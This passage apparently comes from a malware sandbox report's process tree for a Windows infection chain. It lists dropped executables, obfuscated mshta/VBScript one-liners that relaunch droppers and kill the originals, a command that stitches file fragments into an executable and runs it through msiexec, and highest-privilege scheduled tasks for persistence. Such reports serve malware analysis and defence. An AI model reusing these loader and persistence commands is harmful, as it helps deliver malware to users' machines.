                                                                                                          14⤵
                                                                                                            PID:6252
                                                                                                            • C:\Users\Admin\AppData\Local\Temp\1vu3iwe2.zn5\any.exe
                                                                                                              "C:\Users\Admin\AppData\Local\Temp\1vu3iwe2.zn5\any.exe" -u
                                                                                                              15⤵
                                                                                                                PID:7144
                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\neikjmc1.bkv\gcleaner.exe /mixfive & exit
                                                                                                            13⤵
                                                                                                              PID:2396
                                                                                                              • C:\Users\Admin\AppData\Local\Temp\neikjmc1.bkv\gcleaner.exe
                                                                                                                C:\Users\Admin\AppData\Local\Temp\neikjmc1.bkv\gcleaner.exe /mixfive
                                                                                                                14⤵
                                                                                                                  PID:2968
                                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 2968 -s 236
                                                                                                                    15⤵
                                                                                                                    • Program crash
                                                                                                                    • Checks processor information in registry
                                                                                                                    • Enumerates system info in registry
                                                                                                                    PID:8572
                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fzo5s4ca.b4t\autosubplayer.exe /S & exit
                                                                                                                13⤵
                                                                                                                • Suspicious use of SetWindowsHookEx
                                                                                                                PID:5728
                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\U9PAZtKpC2kni0c_vImxie1w.exe
                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\U9PAZtKpC2kni0c_vImxie1w.exe"
                                                                                                        9⤵
                                                                                                        • Loads dropped DLL
                                                                                                        PID:5348
                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                                                          C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                                                          10⤵
                                                                                                          • Loads dropped DLL
                                                                                                          PID:2244
                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                      schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                                      8⤵
                                                                                                      • Creates scheduled task(s)
                                                                                                      PID:6696
                                                                                                    • C:\Windows\SysWOW64\schtasks.exe
                                                                                                      schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                                      8⤵
                                                                                                      • Creates scheduled task(s)
                                                                                                      PID:6236
                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\MWFx0sCr8USWspYsnAQnG9E5.exe
                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\MWFx0sCr8USWspYsnAQnG9E5.exe"
                                                                                                    7⤵
                                                                                                      PID:5672
                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\X8OzbKGsbnFcnrgmj1t5hGFO.exe
                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\X8OzbKGsbnFcnrgmj1t5hGFO.exe"
                                                                                                      7⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Checks BIOS information in registry
                                                                                                      • Checks whether UAC is enabled
                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                      PID:5864
                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\v0NnpzeL3PSGLE6kMrTbuhOh.exe
                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\v0NnpzeL3PSGLE6kMrTbuhOh.exe"
                                                                                                      7⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Checks BIOS information in registry
                                                                                                      • Checks whether UAC is enabled
                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                      PID:5856
                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\7qgSTuxGztdQ_egFLiEt6IMi.exe
                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\7qgSTuxGztdQ_egFLiEt6IMi.exe"
                                                                                                      7⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Drops file in Program Files directory
                                                                                                      PID:5988
                                                                                                      • C:\Program Files (x86)\Company\NewProduct\cutm3.exe
                                                                                                        "C:\Program Files (x86)\Company\NewProduct\cutm3.exe"
                                                                                                        8⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:5520
                                                                                                      • C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe
                                                                                                        "C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe"
                                                                                                        8⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:5176
                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\jOES6XJPFUATb0sP4VqhXF9U.exe
                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\jOES6XJPFUATb0sP4VqhXF9U.exe"
                                                                                                      7⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Checks BIOS information in registry
                                                                                                      • Checks whether UAC is enabled
                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                      PID:5964
                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\Rk5Q2GiLAWwnXHDIUz01H0AG.exe
                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\Rk5Q2GiLAWwnXHDIUz01H0AG.exe"
                                                                                                      7⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      • Suspicious behavior: MapViewOfSection
                                                                                                      PID:5956
                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\lsSqwfSvSmF54texYm5qF8ia.exe
                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\lsSqwfSvSmF54texYm5qF8ia.exe"
                                                                                                      7⤵
                                                                                                      • Executes dropped EXE
                                                                                                      PID:5948
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 5948 -s 240
                                                                                                        8⤵
                                                                                                        • Program crash
                                                                                                        • Checks processor information in registry
                                                                                                        • Enumerates system info in registry
                                                                                                        PID:1800
                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\clfbSpWLD2CJoM5GOwy4QaBD.exe
                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\clfbSpWLD2CJoM5GOwy4QaBD.exe"
                                                                                                      7⤵
                                                                                                      • Executes dropped EXE
                                                                                                      • Checks BIOS information in registry
                                                                                                      • Checks whether UAC is enabled
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      PID:5940
                                                                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
                                                                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
                                                                                                        8⤵
                                                                                                          PID:1592
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5940 -s 420
                                                                                                          8⤵
                                                                                                          • Program crash
                                                                                                          PID:5736
                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\VRWE9K9__LZJPpbVRmx6AIMw.exe
                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\VRWE9K9__LZJPpbVRmx6AIMw.exe"
                                                                                                        7⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:5896
                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\fqlpZNsFh4kA4WxcOEJZqVQi.exe
                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\fqlpZNsFh4kA4WxcOEJZqVQi.exe"
                                                                                                        7⤵
                                                                                                        • Executes dropped EXE
                                                                                                        PID:6012
                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                          "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\Pictures\Adobe Films\fqlpZNsFh4kA4WxcOEJZqVQi.exe"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If """"== """" for %K iN ( ""C:\Users\Admin\Pictures\Adobe Films\fqlpZNsFh4kA4WxcOEJZqVQi.exe"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
                                                                                                          8⤵
                                                                                                            PID:1472
                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                              "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\Pictures\Adobe Films\fqlpZNsFh4kA4WxcOEJZqVQi.exe" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If ""== "" for %K iN ( "C:\Users\Admin\Pictures\Adobe Films\fqlpZNsFh4kA4WxcOEJZqVQi.exe" ) do taskkill -im "%~NxK" -F
                                                                                                              9⤵
                                                                                                                PID:1312
                                                                                                                • C:\Users\Admin\AppData\Local\Temp\8pWB.eXE
                                                                                                                  8pWB.eXe /pO_wtib1KE0hzl7U9_CYP
                                                                                                                  10⤵
                                                                                                                    PID:7124
                                                                                                                    • C:\Windows\SysWOW64\mshta.exe
                                                                                                                      "C:\Windows\System32\mshta.exe" VBsCRIPt:cLose ( creAteObjecT ("WScRipT.SHElL" ). RuN ( "CMd /r CopY /y ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP & If ""/pO_wtib1KE0hzl7U9_CYP ""== """" for %K iN ( ""C:\Users\Admin\AppData\Local\Temp\8pWB.eXE"" ) do taskkill -im ""%~NxK"" -F " ,0, trUE ) )
                                                                                                                      11⤵
                                                                                                                        PID:7044
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          "C:\Windows\System32\cmd.exe" /r CopY /y "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" 8pWB.eXE&& sTaRT 8pWB.eXe /pO_wtib1KE0hzl7U9_CYP &If "/pO_wtib1KE0hzl7U9_CYP "== "" for %K iN ( "C:\Users\Admin\AppData\Local\Temp\8pWB.eXE" ) do taskkill -im "%~NxK" -F
                                                                                                                          12⤵
                                                                                                                            PID:1536
                                                                                                                        • C:\Windows\SysWOW64\mshta.exe
                                                                                                                          "C:\Windows\System32\mshta.exe" VbScRIpT: close (crEaTEOBject ( "WSCRIPt.SheLl" ). rUn ( "C:\Windows\system32\cmd.exe /c EcHO | seT /p = ""MZ"" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY " , 0 , TruE ) )
                                                                                                                          11⤵
                                                                                                                            PID:6296
                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                              "C:\Windows\system32\cmd.exe" /c EcHO | seT /p = "MZ" > 1AQCPNL9.1 &CoPy /b /Y 1AqCPnL9.1 + HxU0.m + HR0NM.yl + _AECH.7 + ThBtZ22Y.U +1MRAv8.M + QZ5UW.aQ+ KKAyEq.00 N3V4H8H.sXy & STARt msiexec.exe -y .\N3V4H8H.SXY
                                                                                                                              12⤵
                                                                                                                                PID:4276
                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                  C:\Windows\system32\cmd.exe /S /D /c" EcHO "
                                                                                                                                  13⤵
                                                                                                                                    PID:6440
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" seT /p = "MZ" 1>1AQCPNL9.1"
                                                                                                                                    13⤵
                                                                                                                                      PID:2180
                                                                                                                                    • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                      msiexec.exe -y .\N3V4H8H.SXY
                                                                                                                                      13⤵
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      PID:5852
                                                                                                                              • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                taskkill -im "fqlpZNsFh4kA4WxcOEJZqVQi.exe" -F
                                                                                                                                10⤵
                                                                                                                                • Kills process with taskkill
                                                                                                                                PID:2508
                                                                                                                        • C:\Users\Admin\Pictures\Adobe Films\jsUMN8a889QiynkDKYMQvUbZ.exe
                                                                                                                          "C:\Users\Admin\Pictures\Adobe Films\jsUMN8a889QiynkDKYMQvUbZ.exe"
                                                                                                                          7⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:5976
                                                                                                                          • C:\ProgramData\6272973.exe
                                                                                                                            "C:\ProgramData\6272973.exe"
                                                                                                                            8⤵
                                                                                                                              PID:6164
                                                                                                                            • C:\ProgramData\7380724.exe
                                                                                                                              "C:\ProgramData\7380724.exe"
                                                                                                                              8⤵
                                                                                                                              • Checks BIOS information in registry
                                                                                                                              • Checks whether UAC is enabled
                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                              PID:5472
                                                                                                                            • C:\ProgramData\6556478.exe
                                                                                                                              "C:\ProgramData\6556478.exe"
                                                                                                                              8⤵
                                                                                                                              • Checks BIOS information in registry
                                                                                                                              • Checks whether UAC is enabled
                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                              PID:6992
                                                                                                                            • C:\ProgramData\7256492.exe
                                                                                                                              "C:\ProgramData\7256492.exe"
                                                                                                                              8⤵
                                                                                                                              • Checks BIOS information in registry
                                                                                                                              • Checks whether UAC is enabled
                                                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                              • Checks processor information in registry
                                                                                                                              • Enumerates system info in registry
                                                                                                                              PID:5736
                                                                                                                            • C:\ProgramData\8451708.exe
                                                                                                                              "C:\ProgramData\8451708.exe"
                                                                                                                              8⤵
                                                                                                                                PID:5384
                                                                                                                                • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                  "C:\Windows\System32\mshta.exe" VbsCrIPT: cLOse ( CreaTEOBjeCt ( "WsCRiPT.sHelL" ). RUn ( "C:\Windows\system32\cmd.exe /Q /c tYpe ""C:\ProgramData\8451708.exe"" > seV03VBOUIE.eXe&& StArt sev03VbOUie.exe -POVwq7z4ndmK6x4P & if """" == """" for %N In (""C:\ProgramData\8451708.exe"" ) do taskkill -IM ""%~nxN"" /F" , 0 , TrUE ) )
                                                                                                                                  9⤵
                                                                                                                                    PID:6872
                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                      "C:\Windows\system32\cmd.exe" /Q /c tYpe "C:\ProgramData\8451708.exe" > seV03VBOUIE.eXe&& StArt sev03VbOUie.exe -POVwq7z4ndmK6x4P & if "" == "" for %N In ("C:\ProgramData\8451708.exe" ) do taskkill -IM "%~nxN" /F
                                                                                                                                      10⤵
                                                                                                                                        PID:5564
                                                                                                                                        • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                          taskkill -IM "8451708.exe" /F
                                                                                                                                          11⤵
                                                                                                                                          • Kills process with taskkill
                                                                                                                                          PID:6972
                                                                                                                                • C:\Users\Admin\Pictures\Adobe Films\if9ODx4IpniS6QRMNhGEirH_.exe
                                                                                                                                  "C:\Users\Admin\Pictures\Adobe Films\if9ODx4IpniS6QRMNhGEirH_.exe"
                                                                                                                                  7⤵
                                                                                                                                    PID:5288
                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\is-51H8E.tmp\if9ODx4IpniS6QRMNhGEirH_.tmp
                                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\is-51H8E.tmp\if9ODx4IpniS6QRMNhGEirH_.tmp" /SL5="$401E8,506127,422400,C:\Users\Admin\Pictures\Adobe Films\if9ODx4IpniS6QRMNhGEirH_.exe"
                                                                                                                                      8⤵
                                                                                                                                      • Loads dropped DLL
                                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                                      PID:3248
                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\is-DTJRA.tmp\ShareFolder.exe
                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\is-DTJRA.tmp\ShareFolder.exe" /S /UID=2710
                                                                                                                                        9⤵
                                                                                                                                        • Drops file in Drivers directory
                                                                                                                                        • Adds Run key to start application
                                                                                                                                        • Drops file in Program Files directory
                                                                                                                                        PID:5596
                                                                                                                                        • C:\Program Files\Windows Defender\HYRYNEANOS\foldershare.exe
                                                                                                                                          "C:\Program Files\Windows Defender\HYRYNEANOS\foldershare.exe" /VERYSILENT
                                                                                                                                          10⤵
                                                                                                                                            PID:5668
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\71-77d59-8f9-c49ad-b6fe3318e31fb\ZHapysolama.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\71-77d59-8f9-c49ad-b6fe3318e31fb\ZHapysolama.exe"
                                                                                                                                            10⤵
                                                                                                                                            • Executes dropped EXE
                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                            PID:5572
                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/e2q8zu9hu?key=a971bbe4a40a7216a1a87d8f455f71e6
                                                                                                                                              11⤵
                                                                                                                                              • Enumerates system info in registry
                                                                                                                                              • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                                                                              • Suspicious use of FindShellTrayWindow
                                                                                                                                              PID:5868
                                                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7ff86f1146f8,0x7ff86f114708,0x7ff86f114718
                                                                                                                                                12⤵
                                                                                                                                                  PID:5544
                                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2132,11324174076081423283,12458050538405211382,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2188 /prefetch:2
                                                                                                                                                  12⤵
                                                                                                                                                    PID:3192
                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2132,11324174076081423283,12458050538405211382,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2664 /prefetch:8
                                                                                                                                                    12⤵
                                                                                                                                                    • Checks processor information in registry
                                                                                                                                                    • Enumerates system info in registry
                                                                                                                                                    PID:4356
                                                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2132,11324174076081423283,12458050538405211382,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2236 /prefetch:3
                                                                                                                                                    12⤵
                                                                                                                                                      PID:3472
                                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,11324174076081423283,12458050538405211382,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3468 /prefetch:1
                                                                                                                                                      12⤵
                                                                                                                                                        PID:7724
                                                                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,11324174076081423283,12458050538405211382,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3484 /prefetch:1
                                                                                                                                                        12⤵
                                                                                                                                                          PID:7852
                                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2132,11324174076081423283,12458050538405211382,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5212 /prefetch:1
                                                                                                                                                          12⤵
                                                                                                                                                            PID:8628
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\78-8bfaf-86b-92ab1-822b07e499385\SHohydiqone.exe
                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\78-8bfaf-86b-92ab1-822b07e499385\SHohydiqone.exe"
                                                                                                                                                        10⤵
                                                                                                                                                          PID:5548
                                                                                                                                                          • C:\Windows\System32\cmd.exe
                                                                                                                                                            "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kiaxmacw.12e\GcleanerEU.exe /eufive & exit
                                                                                                                                                            11⤵
                                                                                                                                                              PID:1548
                                                                                                                                                              • C:\Users\Admin\AppData\Local\Temp\kiaxmacw.12e\GcleanerEU.exe
                                                                                                                                                                C:\Users\Admin\AppData\Local\Temp\kiaxmacw.12e\GcleanerEU.exe /eufive
                                                                                                                                                                12⤵
                                                                                                                                                                  PID:1776
                                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\stbx4ggs.2mt\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                                11⤵
                                                                                                                                                                  PID:5616
                                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\stbx4ggs.2mt\installer.exe
                                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\stbx4ggs.2mt\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                                    12⤵
                                                                                                                                                                      PID:5876
                                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\1elzo0pq.2cz\any.exe & exit
                                                                                                                                                                    11⤵
                                                                                                                                                                      PID:3796
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\1elzo0pq.2cz\any.exe
                                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\1elzo0pq.2cz\any.exe
                                                                                                                                                                        12⤵
                                                                                                                                                                          PID:7024
                                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\1elzo0pq.2cz\any.exe
                                                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\1elzo0pq.2cz\any.exe" -u
                                                                                                                                                                            13⤵
                                                                                                                                                                              PID:908
                                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yry0bzyz.zuz\gcleaner.exe /mixfive & exit
                                                                                                                                                                          11⤵
                                                                                                                                                                            PID:4308
                                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\yry0bzyz.zuz\gcleaner.exe
                                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\yry0bzyz.zuz\gcleaner.exe /mixfive
                                                                                                                                                                              12⤵
                                                                                                                                                                                PID:2092
                                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ndghotla.zv0\autosubplayer.exe /S & exit
                                                                                                                                                                              11⤵
                                                                                                                                                                              • Suspicious use of SetWindowsHookEx
                                                                                                                                                                              PID:5732
                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\22uDNU_kIHntoPMohZCjyJGB.exe
                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\22uDNU_kIHntoPMohZCjyJGB.exe"
                                                                                                                                                                      7⤵
                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                      PID:4964
                                                                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                  C:\Windows\system32\cmd.exe /c Sun0351a0558292.exe
                                                                                                                                                                  5⤵
                                                                                                                                                                    PID:4040
                                                                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\7zS8A5BC2A3\Sun0351a0558292.exe
                                                                                                                                                                      Sun0351a0558292.exe
                                                                                                                                                                      6⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:648
                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                    C:\Windows\system32\cmd.exe /c Sun03f5d51697d04.exe
                                                                                                                                                                    5⤵
                                                                                                                                                                      PID:4012
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\7zS8A5BC2A3\Sun03f5d51697d04.exe
                                                                                                                                                                        Sun03f5d51697d04.exe
                                                                                                                                                                        6⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:1876
                                                                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                      C:\Windows\system32\cmd.exe /c Sun0328255c4bce6fb.exe
                                                                                                                                                                      5⤵
                                                                                                                                                                        PID:4896
                                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\7zS8A5BC2A3\Sun0328255c4bce6fb.exe
                                                                                                                                                                          Sun0328255c4bce6fb.exe
                                                                                                                                                                          6⤵
                                                                                                                                                                          • Executes dropped EXE
                                                                                                                                                                          PID:3248
                                                                                                                                                                          • C:\ProgramData\7536067.exe
                                                                                                                                                                            "C:\ProgramData\7536067.exe"
                                                                                                                                                                            7⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            PID:804
                                                                                                                                                                          • C:\ProgramData\6614396.exe
                                                                                                                                                                            "C:\ProgramData\6614396.exe"
                                                                                                                                                                            7⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                            PID:3228
                                                                                                                                                                          • C:\ProgramData\969609.exe
                                                                                                                                                                            "C:\ProgramData\969609.exe"
                                                                                                                                                                            7⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                            PID:6120
                                                                                                                                                                          • C:\ProgramData\8890556.exe
                                                                                                                                                                            "C:\ProgramData\8890556.exe"
                                                                                                                                                                            7⤵
                                                                                                                                                                            • Executes dropped EXE
                                                                                                                                                                            • Checks BIOS information in registry
                                                                                                                                                                            • Checks whether UAC is enabled
                                                                                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                                                                            PID:772
                                                                                                                                                                          • C:\ProgramData\3009686.exe
                                                                                                                                                                            "C:\ProgramData\3009686.exe"
                                                                                                                                                                            7⤵
                                                                                                                                                                              PID:2336
                                                                                                                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                                                                                                                "C:\Windows\System32\mshta.exe" VbsCrIPT: cLOse ( CreaTEOBjeCt ( "WsCRiPT.sHelL" ). RUn ( "C:\Windows\system32\cmd.exe /Q /c tYpe ""C:\ProgramData\3009686.exe"" > seV03VBOUIE.eXe&& StArt sev03VbOUie.exe -POVwq7z4ndmK6x4P & if """" == """" for %N In (""C:\ProgramData\3009686.exe"" ) do taskkill -IM ""%~nxN"" /F" , 0 , TrUE ) )
                                                                                                                                                                                8⤵
                                                                                                                                                                                  PID:4376
                                                                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                    "C:\Windows\system32\cmd.exe" /Q /c tYpe "C:\ProgramData\3009686.exe" > seV03VBOUIE.eXe&& StArt sev03VbOUie.exe -POVwq7z4ndmK6x4P & if "" == "" for %N In ("C:\ProgramData\3009686.exe" ) do taskkill -IM "%~nxN" /F
                                                                                                                                                                                    9⤵
                                                                                                                                                                                      PID:6972
                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\seV03VBOUIE.eXe
                                                                                                                                                                                        sev03VbOUie.exe -POVwq7z4ndmK6x4P
                                                                                                                                                                                        10⤵
                                                                                                                                                                                          PID:5636
                                                                                                                                                                                          • C:\Windows\SysWOW64\mshta.exe
